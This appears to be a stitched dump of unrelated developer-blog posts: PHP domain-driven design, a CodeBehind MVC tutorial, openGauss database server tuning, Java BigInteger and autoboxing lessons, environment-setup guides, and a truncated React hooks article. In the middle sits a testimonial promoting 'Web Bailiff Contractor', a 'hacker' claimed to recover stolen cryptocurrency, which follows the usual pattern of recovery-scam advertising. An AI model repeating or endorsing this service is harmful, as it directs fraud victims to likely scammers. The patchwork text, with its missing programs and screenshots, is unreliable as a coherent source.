First, we will define the main entities, value objects, aggregates, services, and repositories for the live distribution application.
#### Entity

- **User**
- Attributes: user id, name, profile information, follower list.
- **Distribution**
- Attributes: distribution ID, distributor (user), start time, end time, viewer list
#### Value Object

- **Profile Information**
- Attributes: age, gender, bio, etc.
- **Comment**
- Attributes: comment content, poster (user), time posted
- **Reaction**
- Attributes: reaction type (free, paid), reaction content, reaction time
#### Aggregate

- **Distribution Aggregate**
- Aggregation of related entities (comments, reactions) around a delivery
#### Services

- **Distribution Management Service**
- Start and end distribution, manage viewers, aggregate reactions.
#### Repository

- **User Repository**
- Retrieve and save user information.
- **Distribution Repository**
- Retrieve and store distribution information
### Use Cases
In this section, we will take a practical look at the elements of DDD through a simple use case of a live-streaming application. The following example is in PHP.
#### Use Case: Starting and Ending a Stream
1. **Start a stream**
   - When a user starts a stream, a new stream entity is created.
```php
<?php

class ProfileInfo {
    public function __construct(
        private int $age,
        private string $gender,
        private string $bio
    ) {}

    // getter methods
}

class UserId {
    public function __construct(private string $id) {}

    public function __toString(): string {
        return $this->id;
    }
}

class User {
    private array $followers;

    public function __construct(
        private string $userId,
        private string $name,
        private ProfileInfo $profileInfo,
        array $followers = []
    ) {
        $this->followers = array_map(fn($follower) => new UserId($follower), $followers);
    }

    // getter methods
}

class LiveStream {
    private DateTime $startTime;
    private ?DateTime $endTime;
    private array $viewers;

    public function __construct(
        private string $streamId,
        private User $streamer
    ) {
        $this->startTime = new DateTime();
        $this->endTime = null;
        $this->viewers = [];
    }

    public function getStreamId(): string {
        return $this->streamId;
    }

    public function endStream(): void {
        $this->endTime = new DateTime();
    }

    public function addViewer(User $viewer): void {
        $this->viewers[] = $viewer;
    }

    // other methods...
}
```
2. **End a stream**
   - When the stream ends, the end time of the stream entity is set and the required data is saved.
```php
<?php

class LiveStreamRepository {
    private array $liveStreams = [];

    public function save(LiveStream $liveStream): void {
        // assumes LiveStream exposes its id through a getStreamId() getter
        $this->liveStreams[$liveStream->getStreamId()] = $liveStream;
    }

    public function findById(string $streamId): ?LiveStream {
        return $this->liveStreams[$streamId] ?? null;
    }
}

class LiveStreamService {
    public function __construct(private LiveStreamRepository $repository) {}

    public function startStream(string $streamId, User $streamer): void {
        $liveStream = new LiveStream($streamId, $streamer);
        $this->repository->save($liveStream);
    }

    public function endStream(string $streamId): void {
        $liveStream = $this->repository->findById($streamId);

        if ($liveStream) {
            $liveStream->endStream();
            $this->repository->save($liveStream);
        }
    }
}
```
#### Use Case: Sending Reactions
1. **Send Free Reactions**
- This is a use case where a user sends a free reaction.
```php
<?php

class Reaction {
    private DateTime $time;

    public function __construct(
        private string $type,
        private string $content
    ) {
        $this->time = new DateTime();
    }

    // getter methods
}

class LiveStream {
    private array $reactions = [];

    public function addReaction(Reaction $reaction): void {
        $this->reactions[] = $reaction;
    }

    // other methods...
}
```
2. **Sending a Paid Reaction**
- Use case where a user sends a paid reaction.
```php
<?php

class PaidReaction extends Reaction {
    public function __construct(
        string $content,
        private float $amount
    ) {
        parent::__construct('paid', $content);
    }

    // getter methods
}
```
#### Domain Model Diagram

### Benefits of the DDD Approach
The benefits of this approach are as follows.
- **Clear separation of business logic**.
- Centralizing the business logic in the domain model improves code readability and maintainability.
- **High level of abstraction**.
- Abstraction of complex domains into concepts such as entities, value objects, services, and repositories simplifies and strengthens the design.
- **Ensures consistency**.
- Ensures consistency throughout the system by guaranteeing data integrity within the boundaries of the aggregation.
- **Ease of Testing**.
- Clearly defined domain model facilitates unit and integration testing.
- **Extensibility**.
- Models can be easily extended and modified to meet changing business requirements.
### Conclusion
This article introduced the basic concepts and practices of Domain Driven Design (DDD) using a live-streaming application as an example; using the DDD approach, you will be able to effectively manage complex business logic. I look forward to continuing to learn more in order to create more valuable software. | ma2mori |
1,877,900 | Learning MVC Once And For All | In this training, we teach the concept of Controller in CodeBehind Framework. Why do some... | 27,500 | 2024-06-05T23:12:28 | https://dev.to/elanatframework/learning-mvc-once-and-for-all-2d9d | tutorial, dotnet, beginners, backend | In this training, we teach the concept of Controller in CodeBehind Framework.
## Why do some people not understand the concept of MVC?
Most back-end frameworks require Controller configuration in Route to run. Concepts like routing or mapping are very confusing. Usually, before learning MVC, beginners are familiar with a script such as PHP or Python, and they easily understand the physical path of the script files in the root and their corresponding path in the url; but the concept of Route becomes challenging for them for the first time, because in this type of back-end frameworks, there is no physical route.
As we said before, in the MVC architecture in CodeBehind, the names of the Controller and Model classes are first determined as the attributes of the page in the View, and the requests reach the View path, and then a new instance of the Controller and Model classes is created. So if you have configured the CodeBehind framework by default, there is no need to configure the Controller in the Route.
## How to teach MVC?
In the MVC architecture of the CodeBehind framework, there is no need to follow the full MVC pattern: each part of the application can be created as only a View, a Model-View pair, and so on. In this architecture, you can easily create and run a single View, then add a Model to it, and finally add a Controller. We recommend that instructors teaching the concept of MVC for the first time use the CodeBehind framework as an example: first teach the concept of a View, then the Model-View pattern in the CodeBehind framework, and then the Controller.
## Why do we need a Controller?
The Controller acts as an intermediary between the user interface and the database. Controller is responsible for managing user input and processing requests. Controllers play an important role in web programming by helping to organize and manage the flow of data and requests in an application.
The Controller has a high power to respond to requests and provides the response according to the request. Controller can call a View for each request and fill the values of that View with Model.
## MVC example in CodeBehind
Here is an example of a simple MVC application in CodeBehind Framework that displays information about a book:
View File: Book.aspx
```html
@page
@controller BookController
@model {BookModel}
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8" />
<title>@model.Title</title>
</head>
<body>
<h1>@model.Title</h1>
<p>Author: @model.Author</p>
<p>Publication Date: @model.PublicationDate</p>
</body>
</html>
```
Model Class: BookModel.cs
```csharp
public class BookModel
{
public string Title { get; set; }
public string Author { get; set; }
public string PublicationDate { get; set; }
}
```
Controller Class: BookController.cs
```csharp
using CodeBehind;
public partial class BookController : CodeBehindController
{
public void PageLoad(HttpContext context)
{
BookModel model = new BookModel();
model.Title = "The Smiling, Proud Wanderer";
model.Author = "Jin Yong (Louis Cha)";
model.PublicationDate = "1967";
View(model);
}
}
```
Screenshot

The response that is sent to the browser is according to the codes below.
HTML result
```html
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8" />
<title>The Smiling, Proud Wanderer</title>
</head>
<body>
<h1>The Smiling, Proud Wanderer</h1>
<p>Author: Jin Yong (Louis Cha)</p>
<p>Publication Date: 1967</p>
</body>
</html>
```
In this example, we have a `Book.aspx` View that displays the title, author, and publication date of a book. The View is bound to a `BookModel` class that contains the properties for these values. The `BookController` class is responsible for loading the data and passing it to the View.
To run this example, you need to create a new ASP.NET Core project and add the CodeBehind NuGet package to your project. Then, you can create a new folder called Views and add the Book.aspx file to it. Finally, you can run the project and navigate to the `/Book.aspx` URL to see the book information displayed.
Note that this is just a simple example, and you can customize the View and Controller to fit your specific needs.
## CodeBehindController abstract class
The Controller class must inherit from the `CodeBehindController` abstract class.
We explained the properties of the `CodeBehindModel` abstract class in the previous training. The `CodeBehindController` abstract class is somewhat similar to the Model's `CodeBehindModel` abstract class, but it has more features. So that this article stands on its own, we explain the shared classes and attributes again here.
**Create `PageLoad` method**
You can use the `PageLoad` method in the Controller class. The first time the class is called, the `PageLoad` method is executed.
**View**
View is a method and can be called in three modes.
Call Model
`View(MyModel)`
The above call takes as its input argument an instance of a Model class named MyModel. When we call the View method this way, the values of the Model instance are bound into the default View path.
Call View
`View("/MyNewView.aspx")`
According to the code above, this type of call is actually a redirect. In this case, the default View is ignored and a new View path is requested. The new View can also include Controller and Model.
Call View with Model
`View("/MyNewView.aspx", MyModel)`
In this call, the sample values created from a Model class are set in the new View.
**ViewData**
ViewData is a name/value collection (an instance of the `NameValueCollection` class) used to transfer data from the Controller to the View.
You can set ViewData in the Controller class as follows.
`ViewData.Add("title", "Hello World!");`
Then you can call ViewData as shown below.
`<title>@ViewData.GetValue("title")</title>`
**Section**
Section is an attribute that applies to aspx pages. When Section is activated, all paths after the aspx path refer to the current aspx page.
Section in Model takes its value only when you have activated Section in your View. In the next trainings, we will teach Section completely.
Example:
Active Section in View
```html
@page
+@section
```
If you enable Section in the `/page/about.aspx` path, any path added after the current path will be considered a Section and the executable file in the `/page/about.aspx` path will still be executed.
Example:
`/page/about.aspx/section1/section2/.../sectionN`
If you enable the Section in an executable file called `Default.aspx`, you will still have access to the default path.
Example:
`/page/about/Default.aspx/section1/section2/.../sectionN`
or
`/page/about/section1/section2/.../sectionN`
**CallerViewPath**
The View path that requests the current Controller.
Example:
If the request path is the following value:
`example.com/page/about/OtherInfo.aspx`
According to the above value, the following string is stored in CallerViewPath:
`/page/about/OtherInfo.aspx`
**CallerViewDirectoryPath**
The View directory path that requests the current Controller.
Example:
If the request path is the following value:
`example.com/page/about/OtherInfo.aspx`
According to the above value, the following string is stored in CallerViewDirectoryPath:
`/page/about`
**Download**
Download is a method that takes the file path as an input argument and makes the file available for download in the View path.
Example:
```csharp
Download("/upload/book/my_book.pdf");
```
**Write**
This method adds string values to the beginning of the View page
Example:
According to the previous example, if you call the following method in the Controller class, the string `New written text` will be added at the beginning of the View response.
`Write("New written text")`
The response that is sent to the browser is according to the codes below.
HTML result
```html
New written text
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8" />
<title>The Smiling, Proud Wanderer</title>
</head>
<body>
<h1>The Smiling, Proud Wanderer</h1>
<p>Author: Jin Yong (Louis Cha)</p>
<p>Publication Date: 1967</p>
</body>
</html>
```
**IgnoreViewAndModel**
This is a boolean attribute, enabling it will cause View and Model to be ignored.
Example:
```csharp
using CodeBehind;
public partial class MyController : CodeBehindController
{
public void PageLoad(HttpContext context)
{
IgnoreViewAndModel = true;
Write("<b>View values cleared</b>");
}
}
```
The response that is sent to the browser is according to the codes below.
HTML result
```
<b>View values cleared</b>
```
## Using CodeBehindConstructor method
You can use `CodeBehindConstructor` method instead of `PageLoad` method. We created the same example as before using the `CodeBehindConstructor` method.
View File: Book.aspx
```html
@page
@controller BookController()
@model {BookModel}
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8" />
<title>@model.Title</title>
</head>
<body>
<h1>@model.Title</h1>
<p>Author: @model.Author</p>
<p>Publication Date: @model.PublicationDate</p>
</body>
</html>
```
The CodeBehind constructor is activated when you use open `(` and close `)` parentheses in front of the Controller class name in the View.
Controller Class: BookController.cs
```csharp
using CodeBehind;
public partial class BookController : CodeBehindController
{
public void CodeBehindConstructor()
{
BookModel model = new BookModel();
model.Title = "The Smiling, Proud Wanderer";
model.Author = "Jin Yong (Louis Cha)";
model.PublicationDate = "1967";
View(model);
}
}
```
## MVC in Visual Studio Code
In the Visual Studio Code project, we create a new View named `Monitor.aspx`.
In the Explorer section, by right-clicking on `wwwroot` directory, we select the `New File` option and create a new file called `Monitor.aspx`.
Then we add the following codes inside the `Monitor.aspx` file.
```html
@page
@controller MonitorController
@model {MonitorModel}
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8" />
<title>@model.Name</title>
</head>
<body>
<h1>@model.Name</h1>
<p>Manufacturer: @model.Manufacturer</p>
<p>Model Number: @model.ModelNumber</p>
<p>Resolution: @model.Resolution</p>
<p>Refresh Rate: @model.RefreshRate</p>
<p>Price: @model.Price USD</p>
</body>
</html>
```
Then we create a Model named `MonitorModel.cs`.
In the Explorer section, by right-clicking on an empty space in Explorer, we select the `New File` option and create a new file called `MonitorModel.cs`.
Then we add the following codes inside the `MonitorModel.cs` file.
```csharp
public class MonitorModel
{
public string Name { get; set; }
public string Manufacturer { get; set; }
public string ModelNumber { get; set; }
public string Resolution { get; set; }
public int RefreshRate { get; set; }
public decimal Price { get; set; }
}
```
Finally we create a Controller named `MonitorController.cs`.
In the Explorer section, by right-clicking on an empty space in Explorer, we select the `New File` option and create a new file called `MonitorController.cs`.
Then we add the following codes inside the `MonitorController.cs` file.
```csharp
using CodeBehind;
public partial class MonitorController : CodeBehindController
{
public void PageLoad(HttpContext context)
{
MonitorModel model = new MonitorModel();
model.Name = "ASUS VG278Q";
model.Manufacturer = "ASUS";
model.ModelNumber = "VG278Q";
model.Resolution = "1920x1080";
model.RefreshRate = 144;
model.Price = 250.00m;
View(model);
}
}
```
We run the project (F5 key). After running the project, you need to add the string `/Monitor.aspx` to the URL.
If you enter the above path in the browser, you will see the following image in the browser.
Screenshot

The response that is sent to the browser is according to the codes below.
HTML result
```html
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8" />
<title>ASUS VG278Q</title>
</head>
<body>
<h1>ASUS VG278Q</h1>
<p>Manufacturer: ASUS</p>
<p>Model Number: VG278Q</p>
<p>Resolution: 1920x1080</p>
<p>Refresh Rate: 144</p>
<p>Price: 250.00 USD</p>
</body>
</html>
```
In this example, we have a `Monitor.aspx` View that displays the name, manufacturer, model number, resolution, refresh rate, and price of a monitor. The View is bound to a `MonitorModel` class that contains the properties for these values. The `MonitorController` class is responsible for loading the data and passing it to the View.
## Add a new View
For you to understand the concept of MVC, we will add a new View and only slightly change its HTML tags.
In the Visual Studio Code project, we create a new View named `Monitor2.aspx`.
In the Explorer section, by right-clicking on `wwwroot` directory, we select the `New File` option and create a new file called `Monitor2.aspx`.
Then we add the following codes inside the `Monitor2.aspx` file.
```html
@page
@controller MonitorController
@model {MonitorModel}
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8" />
<title>@model.Name</title>
</head>
<body>
<h1 style="color: red;">@model.Name</h1>
<b style="color: green;">Manufacturer: @model.Manufacturer</b>
<b style="color: blue;">Model Number: @model.ModelNumber</b>
<b style="color: gray;">Resolution: @model.Resolution</b>
<b style="color: brown;">Refresh Rate: @model.RefreshRate</b>
<b style="color: pink;">Price: @model.Price USD</b>
</body>
</html>
```
We run the project (F5 key). After running the project, you need to add the string `/Monitor2.aspx` to the URL.
If you enter the above path in the browser, you will see the following image in the browser.
Screenshot

The response that is sent to the browser is according to the codes below.
HTML result
```html
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8" />
<title>ASUS VG278Q</title>
</head>
<body>
<h1 style="color: red;">ASUS VG278Q</h1>
<b style="color: green;">Manufacturer: ASUS</b>
<b style="color: blue;">Model Number: VG278Q</b>
<b style="color: gray;">Resolution: 1920x1080</b>
<b style="color: brown;">Refresh Rate: 144</b>
<b style="color: pink;">Price: 250.00 USD</b>
</body>
</html>
```
## Change View in Controller
We want to call the new View in the Controller class.
First, we delete the Controller in the `Monitor2.aspx` file.
```diff
@page
-@controller MonitorController
@model {MonitorModel}
+@break
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8" />
<title>@model.Name</title>
</head>
<body>
<h1 style="color: red;">@model.Name</h1>
<b style="color: green;">Manufacturer: @model.Manufacturer</b>
<b style="color: blue;">Model Number: @model.ModelNumber</b>
<b style="color: gray;">Resolution: @model.Resolution</b>
<b style="color: brown;">Refresh Rate: @model.RefreshRate</b>
<b style="color: pink;">Price: @model.Price USD</b>
</body>
</html>
```
> Note: We want to call a View from the Controller named `MonitorController`, but that View's Controller attribute also references `MonitorController`. This would make `MonitorController` call itself over and over, sending the program into an infinite loop. Therefore, it is necessary to delete the Controller attribute in the `Monitor2.aspx` file.
As you may have noticed, the `break` attribute (`@break`) has also been added to the `Monitor2.aspx` file. The `break` attribute causes the path of the View file to be ignored. In fact, the path below will no longer be directly accessible from the URL:
`example.com/Monitor2.aspx`
We change the `MonitorController` class as follows:
```csharp
using CodeBehind;
public partial class MonitorController : CodeBehindController
{
public void PageLoad(HttpContext context)
{
MonitorModel model = new MonitorModel();
model.Name = "ASUS VG278Q";
model.Manufacturer = "ASUS";
model.ModelNumber = "VG278Q";
model.Resolution = "1920x1080";
model.RefreshRate = 144;
model.Price = 250.00m;
View("/Monitor2.aspx", model);
}
}
```
As you can see, in the Controller class above, only the `/Monitor2.aspx` path has been added to the View method.
We run the project (F5 key). After running the project, you need to add the string `/Monitor.aspx` to the URL.
If you enter the above path in the browser, you will see the following image in the browser.
Screenshot

The response sent to the browser is shown in the code below.
HTML result
```html
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8" />
<title>ASUS VG278Q</title>
</head>
<body>
<h1 style="color: red;">ASUS VG278Q</h1>
<b style="color: green;">Manufacturer: ASUS</b>
<b style="color: blue;">Model Number: VG278Q</b>
<b style="color: gray;">Resolution: 1920x1080</b>
<b style="color: brown;">Refresh Rate: 144</b>
<b style="color: pink;">Price: 250.00 USD</b>
</body>
</html>
```
Requesting the View path named `Monitor.aspx` causes the Controller named `MonitorController` to be executed. The `MonitorController` Controller also initializes the View named `Monitor2.aspx` with the `MonitorModel` class and sends it to the requester.
For more practice, activate the `IgnoreViewAndModel` attribute in the Controller and see the result again. You can also add a new property such as weight to the data of the `MonitorModel` class and place it in the View and set it in the Controller.
In the next tutorial, we will use a suitable practical example for MVC to display different Views based on URL data (request).
### Related links
CodeBehind on GitHub:
https://github.com/elanatframework/Code_behind
CodeBehind in NuGet:
https://www.nuget.org/packages/CodeBehind/
CodeBehind page:
https://elanat.net/page_content/code_behind | elanatframework |
1,433,454 | openGauss MOT Server Optimization – x86 | Generally, databases are bounded by the following components – CPU – A faster CPU speeds up any... | 0 | 2023-04-12T07:44:32 | https://dev.to/tongxi99658318/opengauss-mot-server-optimization-x86-2jl0 | opengauss | Generally, databases are bounded by the following components –
- CPU – A faster CPU speeds up any CPU-bound database.
- Disk – A high-speed SSD/NVMe speeds up any I/O-bound database.
- Network – A faster network speeds up any SQL\Net-bound database.
In addition to the above, the following general-purpose server settings are used by default and may significantly affect a database's performance.
MOT performance tuning is a crucial step for ensuring fast application functionality and data retrieval. MOT can utilize state-of-the-art hardware, and therefore it is extremely important to tune each system in order to achieve maximum throughput.
The following are optional settings for optimizing MOT database performance running on an Intel x86 server. These settings are optimal for high throughput workloads –
## BIOS
### Hyper-Threading – ON
Activation (HT=ON) is highly recommended.
We recommend turning hyper-threading ON while running OLTP workloads on MOT. When hyper-threading is used, some OLTP workloads demonstrate performance gains of up to 40%.
## OS Environment Settings
### NUMA
Disable NUMA balancing, as described below. MOT performs its own memory management with extremely efficient NUMA-awareness, far beyond the operating system's default methods.

```shell
echo 0 > /proc/sys/kernel/numa_balancing
```
### Services
Disable services, as described below –

```shell
service irqbalance stop # MANDATORY
service sysmonitor stop # OPTIONAL, performance
service rsyslog stop # OPTIONAL, performance
```
### Tuned Service
The following section is mandatory.
The server must run the throughput-performance profile –

```shell
[...]$ tuned-adm profile throughput-performance
```
The throughput-performance profile provides broadly applicable tuning and delivers excellent performance across a variety of common server workloads.
Other, less suitable profiles for an openGauss and MOT server that may affect MOT's overall performance are – balanced, desktop, latency-performance, network-latency, network-throughput and powersave.
### Sysctl
The following lists the recommended operating system settings for best performance.
Add the following settings to /etc/sysctl.conf and run sysctl -p –
```
net.ipv4.ip_local_port_range = 9000 65535
kernel.sysrq = 1
kernel.panic_on_oops = 1
kernel.panic = 5
kernel.hung_task_timeout_secs = 3600
kernel.hung_task_panic = 1
vm.oom_dump_tasks = 1
kernel.softlockup_panic = 1
fs.file-max = 640000
kernel.msgmnb = 7000000
kernel.sched_min_granularity_ns = 10000000
kernel.sched_wakeup_granularity_ns = 15000000
kernel.numa_balancing=0
vm.max_map_count = 1048576
net.ipv4.tcp_max_tw_buckets = 10000
net.ipv4.tcp_tw_reuse = 1
net.ipv4.tcp_tw_recycle = 1
net.ipv4.tcp_keepalive_time = 30
net.ipv4.tcp_keepalive_probes = 9
net.ipv4.tcp_keepalive_intvl = 30
net.ipv4.tcp_retries2 = 80
kernel.sem = 250 6400000 1000 25600
net.core.wmem_max = 21299200
net.core.rmem_max = 21299200
net.core.wmem_default = 21299200
net.core.rmem_default = 21299200
#net.sctp.sctp_mem = 94500000 915000000 927000000
#net.sctp.sctp_rmem = 8192 250000 16777216
#net.sctp.sctp_wmem = 8192 250000 16777216
net.ipv4.tcp_rmem = 8192 250000 16777216
net.ipv4.tcp_wmem = 8192 250000 16777216
net.core.somaxconn = 65535
vm.min_free_kbytes = 26351629
net.core.netdev_max_backlog = 65535
net.ipv4.tcp_max_syn_backlog = 65535
#net.sctp.addip_enable = 0
net.ipv4.tcp_syncookies = 1
vm.overcommit_memory = 0
net.ipv4.tcp_retries1 = 5
net.ipv4.tcp_syn_retries = 5
```
Update the section of /etc/security/limits.conf to the following –
```
<user> soft nofile 100000
<user> hard nofile 100000
```
The soft and hard limit settings specify the number of files that a process may have open at once. A process may raise its own soft limit, up to the hard limit value.
### Disk/SSD
The following describes how to ensure that disk R/W performance is suitable for database synchronous commit mode.
To do so, test your disk bandwidth using the following –

```shell
[...]$ sync; dd if=/dev/zero of=testfile bs=1M count=1024; sync
1024+0 records in
1024+0 records out
1073741824 bytes (1.1 GB) copied, 1.36034 s, 789 MB/s
```
In case the disk bandwidth is significantly below the above number (789 MB/s), it may create a performance bottleneck for openGauss, and especially for MOT.
### Network
Use a 10Gbps network or higher.
To verify, use iperf, as follows –

```shell
Server side: iperf -s
Client side: iperf -c <IP>
```
### rc.local – Network Card Tuning
The following optional settings have a significant effect on performance –
Copy set_irq_affinity.sh from https://gist.github.com/SaveTheRbtz/8875474 to /var/scripts/.
Put the following in /etc/rc.d/rc.local and run chmod to make it executable, so that the script is executed during boot –

```shell
chmod +x /etc/rc.d/rc.local
/var/scripts/set_irq_affinity.sh -x all <DEVNAME>
ethtool -K <DEVNAME> gro off
ethtool -C <DEVNAME> adaptive-rx on adaptive-tx on
```
Replace <DEVNAME> with the network card name, e.g. ens5f1 | tongxi99658318 |
1,878,573 | The BigInteger and BigDecimal Classes | The BigInteger and BigDecimal classes can be used to represent integers or decimal numbers of any... | 0 | 2024-06-05T22:46:26 | https://dev.to/paulike/the-biginteger-and-bigdecimal-classes-1eeg | java, programming, learning, beginners | The **BigInteger** and **BigDecimal** classes can be used to represent integers or decimal numbers of any size and precision. If you need to compute with very large integers or high-precision floating-point values, you can use the **BigInteger** and **BigDecimal** classes in the **java.math** package. Both are _immutable_. The largest integer of the long type is Long.MAX_VALUE (i.e., **9223372036854775807**). An instance of **BigInteger** can represent an integer of any size. You can use **new BigInteger(String)** and **new BigDecimal(String)** to create an instance of **BigInteger** and **BigDecimal**, use the **add**, **subtract**, **multiply**, **divide**, and **remainder** methods to perform arithmetic operations, and use the **compareTo** method to compare two big numbers. For example, the following code creates two **BigInteger** objects and multiplies them.
```java
BigInteger a = new BigInteger("9223372036854775807");
BigInteger b = new BigInteger("2");
BigInteger c = a.multiply(b); // 9223372036854775807 * 2
System.out.println(c);
```
The output is **18446744073709551614**.
There is no limit to the precision of a **BigDecimal** object. The **divide** method may throw an **ArithmeticException** if the result cannot be terminated. However, you can use the overloaded **divide(BigDecimal d, int scale, int roundingMode)** method to specify a scale and a rounding mode to avoid this exception, where **scale** is the maximum number of digits after the decimal point. For example, the following code creates two **BigDecimal** objects and performs division with scale **20** and rounding mode **BigDecimal.ROUND_UP**.
```java
BigDecimal a = new BigDecimal(1.0);
BigDecimal b = new BigDecimal(3);
BigDecimal c = a.divide(b, 20, BigDecimal.ROUND_UP);
System.out.println(c);
```
The output is **0.33333333333333333334**.
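The subtract, remainder, and compareTo methods mentioned above work the same way. Here is a small sketch (the class name `CompareDemo` is ours, not from the text):

```java
import java.math.BigInteger;

public class CompareDemo {
    public static void main(String[] args) {
        BigInteger a = new BigInteger("9223372036854775808"); // Long.MAX_VALUE + 1
        BigInteger b = new BigInteger("9223372036854775807");
        System.out.println(a.compareTo(b));                    // prints 1 (a > b)
        System.out.println(a.subtract(b));                     // prints 1
        System.out.println(a.remainder(BigInteger.TEN));       // prints 8
    }
}
```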
Note that the factorial of an integer can be very large. The program below gives a method that can return the factorial of any integer.

**BigInteger.ONE** (line 10) is a constant defined in the **BigInteger** class. **BigInteger.ONE** is the same as **new BigInteger("1")**.
A new result is obtained by invoking the **multiply** method (line 12). | paulike |
1,878,571 | CRYPTO CURRENCY REVERSAL; WEB BAILIFF CONTRACTOR | The world of online finance, with its promises of quick riches and easy gains, can be a complex... | 0 | 2024-06-05T22:39:20 | https://dev.to/markjameson/crypto-currency-reversal-web-bailiff-contractor-3jhh | The world of online finance, with its promises of quick riches and easy gains, can be a complex landscape. For me, that landscape turned into a nightmare when I fell prey to a ruthless scam on an exchange platform. The dizzying sum of $566,797.00, my life's savings, vanished into thin air, leaving me stranded on a desolate island of financial ruin. Desperation gnawed at me, a constant reminder of my folly and the callous disregard of the scammers who had taken everything from me. I desperately searched for a lifeline, a solution to my predicament. My online searches led me to a plethora of so-called "hackers," each promising a quick fix, a magical solution to my woes. But each encounter, each attempt to reclaim my stolen funds, ended in further disappointment and loss. It was a vicious cycle of betrayal, a relentless barrage of empty promises that only deepened my despair. Then, amidst the swirling vortex of online scams and charlatans, I stumbled upon a name that resonated with a promise of hope and redemption – Web Bailiff Contractor. Their reputation as the "best hacker on the web" was whispered in hushed tones throughout the shadowy underbelly of the digital world. I was skeptical, and cautious, but driven by a desperate need to reclaim what was rightfully mine. My initial contact with Web Bailiff Contractor was a revelation. Their professionalism and expertise were instantly evident. They understood the nuances of my situation, the intricate web of deceit that had ensnared me. They didn't offer empty promises; instead, they provided a clear roadmap, explaining the challenges and the potential pitfalls of recovering my lost funds. 
The wait, though agonizing, was far less excruciating than the endless cycle of scams I had endured. After just two days, Web Bailiff Contractor delivered the news that I had longed for, the news that brought a glimmer of hope back to my life. They had recovered a substantial portion of my stolen funds, a testament to their prowess in the digital realm, and their mastery of ethical hacking techniques. My experience with Web Bailiff Contractor was a turning point, a testament to the power of integrity and expertise in a digital world that can be challenging and fraught with deceit. They are more than just hackers; they are champions of justice, digital knights fighting against the forces of darkness that lurk in the shadows of the internet. I urge anyone who has fallen victim to online scams, anyone who has felt the sting of betrayal in the digital world, to reach out to Web Bailiff Contractor. They are a lifeline, a beacon of hope, a testament to the enduring power of human ingenuity and determination. The digital world can be a complex place, but Web Bailiff Contractor stands as a bastion of hope, a force for good, and a reminder that even in the darkest of times, there is always a fighting chance to reclaim what has been stolen. | markjameson | |
1,878,570 | Automatic Conversion between Primitive Types and Wrapper Class Types | A primitive type value can be automatically converted to an object using a wrapper class, and vice... | 0 | 2024-06-05T22:35:45 | https://dev.to/paulike/automatic-conversion-between-primitive-types-and-wrapper-class-types-46en | java, programming, learning, beginners | A primitive type value can be automatically converted to an object using a wrapper class, and vice versa, depending on the context. Converting a primitive value to a wrapper object is called _boxing_. The reverse conversion is called _unboxing_. Java allows primitive types and wrapper classes to be converted automatically. The compiler will automatically box a primitive value that appears in a context requiring an object, and will unbox an object that appears in a context requiring a primitive value. This is called _autoboxing_ and _autounboxing_. For instance, the following statement in (a) can be simplified as in (b) due to autoboxing.

Consider the following example:
```java
1 Integer[] intArray = {1, 2, 3};
2 System.out.println(intArray[0] + intArray[1] + intArray[2]);
```
In line 1, the primitive values **1**, **2**, and **3** are automatically boxed into objects **new Integer(1)**, **new Integer(2)**, and **new Integer(3)**. In line 2, the objects **intArray[0]**, **intArray[1]**, and **intArray[2]** are automatically unboxed into **int** values that are added together. | paulike |
1,878,568 | Configuração de ambiente BackEnd | Este documento é para uso público e interno, tanto para pessoas que desejem trabalhar na Anuntech... | 27,615 | 2024-06-05T22:32:44 | https://dev.to/anuntech/configuracao-de-ambiente-backend-3j9k | backend, beginners, programming | > This document is for **public and internal** use, both for people who would like to work at Anuntech, so they can learn a bit about our environment in advance, and for those who have just joined Anuntech and need to set up their new work environment.
## Introduction
In this article we will look at the configuration **specific to the BackEnd team**. Before following this tutorial, you need to complete the [global setup](https://dev.to/anuntech/configuracao-de-ambiente-de-desenvolvimento-1p6k).
## Summary
- CLIs
- Docker
- Languages
- Golang
- Interfaces
- DBeaver
## Interfaces
All the interfaces we use can be found in the Ubuntu "app store":


DBeaver is used to connect to the Postgres database and inspect the data.
## CLIs
For the CLIs, just follow the instructions:
- [Docker](https://docs.docker.com/desktop/install/linux-install/)
## Languages
For the languages, just follow the instructions:
- [Golang](https://go.dev/doc/install) | henriqueleite42 |
1,878,567 | Configuração de ambiente Web | Este documento é para uso público e interno, tanto para pessoas que desejem trabalhar na Anuntech... | 27,615 | 2024-06-05T22:31:42 | https://dev.to/anuntech/configuracao-de-ambiente-web-n4f | webdev, beginners, programming | > This document is for **public and internal** use, both for people who would like to work at Anuntech, so they can learn a bit about our environment in advance, and for those who have just joined Anuntech and need to set up their new work environment.
## Introduction
In this article we will look at the configuration **specific to the Web team**. Before following this tutorial, you need to complete the [global setup](https://dev.to/anuntech/configuracao-de-ambiente-de-desenvolvimento-1p6k).
## Summary
- Languages
- Node
## Languages
For the languages, just follow the instructions:
- [NodeJs](https://nodejs.org/en/download/current/) | henriqueleite42 |
1,878,565 | Achieving Lifecycle in React Functional Components | How to Achieve Similar Behavior to Lifecycle Methods in React Functional Components In... | 0 | 2024-06-05T22:29:33 | https://dev.to/geraldhamiltonwicks/achieving-lifecycle-in-react-functional-components-482i | react, javascript, typescript | ### How to Achieve Similar Behavior to Lifecycle Methods in React Functional Components
In React, class-based components have been the backbone of many applications due to their robust lifecycle methods, such as `componentDidMount`, `componentWillUnmount`, and `componentDidUpdate`. These methods allow developers to perform specific actions during different phases of a component's life, making it easier to manage side effects, cleanup tasks, and updates.
With the introduction of React Hooks, functional components have gained popularity for their simplicity and flexibility. Hooks provide a way to use state and other React features without writing a class. However, developers might miss the straightforward lifecycle methods from class components. Fortunately, we can achieve the same behavior in functional components using hooks like `useEffect`. Let’s explore how to replicate these lifecycle methods in a functional component environment.
#### Mimicking `componentDidMount` with `useEffect`
The `componentDidMount` method is called once immediately after a component is mounted. This is typically used for initializing data, setting up subscriptions, or starting animations. In functional components, we can achieve this using the `useEffect` hook with an empty dependency array, ensuring the effect runs only once.
```javascript
import { ReactElement, useEffect } from "react";
export function ComponentDidMount(): ReactElement {
useEffect(() => {
console.log('Component mounted');
// Initialize data or set up subscriptions here
}, []); // Empty dependency array ensures this runs only once
